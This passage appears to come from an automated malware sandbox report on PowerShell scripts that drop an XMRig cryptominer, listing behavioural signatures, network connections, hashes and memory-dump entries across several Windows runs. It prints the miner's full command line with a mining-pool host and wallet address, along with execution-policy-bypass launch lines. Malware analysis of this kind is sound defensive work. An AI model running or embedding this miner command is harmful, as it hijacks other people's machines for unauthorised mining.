| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/404-26-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/404-49-0x00000225A3DE0000-0x00000225A3DF2000-memory.dmp
memory/404-62-0x00000225A3DB0000-0x00000225A3DBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2528-91-0x000001F716CF0000-0x000001F716D10000-memory.dmp
memory/2528-92-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/404-93-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/404-95-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp
memory/2528-94-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/404-96-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/2528-97-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-98-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-99-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-100-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-101-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-102-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-103-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-104-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-105-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-106-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-107-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-108-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-109-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-110-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-111-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-112-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-113-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-114-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-115-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-116-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-117-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-118-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-119-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-120-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-121-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-122-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-123-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-124-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-125-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-126-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-127-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-128-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-129-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-130-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-131-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-132-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-133-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-134-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-135-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-136-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-137-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-138-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-139-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-140-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-141-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-142-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-143-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-144-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-145-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-146-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-147-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-148-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-149-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-150-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-151-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-152-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-153-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-154-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-155-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-156-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-157-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:24
Platform
win7-20240221-en
Max time kernel
1556s
Max time network
1561s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
Files
memory/1664-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp
memory/1664-5-0x000000001B3B0000-0x000000001B692000-memory.dmp
memory/1664-6-0x0000000002310000-0x0000000002318000-memory.dmp
memory/1664-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-11-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-12-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:41
Platform
win10v2004-20240508-en
Max time kernel
1662s
Max time network
1671s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 52.111.227.14:443 | tcp |
Files
memory/4220-0-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp
memory/4220-1-0x0000018758790000-0x00000187587B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m2a55eua.0b5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4220-11-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-12-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-13-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-14-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-15-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-16-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp
memory/4220-17-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-18-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:48
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3152 wrote to memory of 4316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3152 wrote to memory of 4316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/3152-3-0x00007FFC012B3000-0x00007FFC012B4000-memory.dmp
memory/3152-5-0x0000011D3BEB0000-0x0000011D3BED2000-memory.dmp
memory/3152-7-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
memory/3152-9-0x0000011D3C060000-0x0000011D3C0D6000-memory.dmp
memory/3152-10-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xymowxz0.cfe.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3152-26-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
memory/3152-49-0x0000011D3C0E0000-0x0000011D3C0F2000-memory.dmp
memory/3152-62-0x0000011D3C040000-0x0000011D3C04A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4316-91-0x000002A746F30000-0x000002A746F50000-memory.dmp
memory/4316-92-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-93-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/3152-94-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
memory/3152-95-0x00007FFC012B3000-0x00007FFC012B4000-memory.dmp
memory/3152-96-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
memory/4316-97-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-98-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-99-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-100-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-101-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-102-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-103-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-104-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-105-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-106-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-107-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-108-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-109-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-110-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-111-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-112-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-113-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-114-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-115-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-116-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-117-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-118-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-119-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-120-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-121-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-122-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-123-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-124-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-125-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-126-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-127-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-128-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-129-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-130-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-131-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-132-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-133-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-134-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-135-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-136-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-137-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-138-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-139-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-140-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-141-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-142-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-143-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-144-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-145-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-146-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-147-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-148-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-149-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-150-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-151-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-152-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-153-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-154-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-155-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-156-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-157-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:50
Platform
win11-20240508-en
Max time kernel
1766s
Max time network
1775s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/1056-0-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_he5huove.y1p.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1056-9-0x0000026960040000-0x0000026960062000-memory.dmp
memory/1056-10-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp
memory/1056-11-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp
memory/1056-12-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp
memory/1056-13-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp
memory/1056-14-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:29
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4716 wrote to memory of 1356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4716 wrote to memory of 1356 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
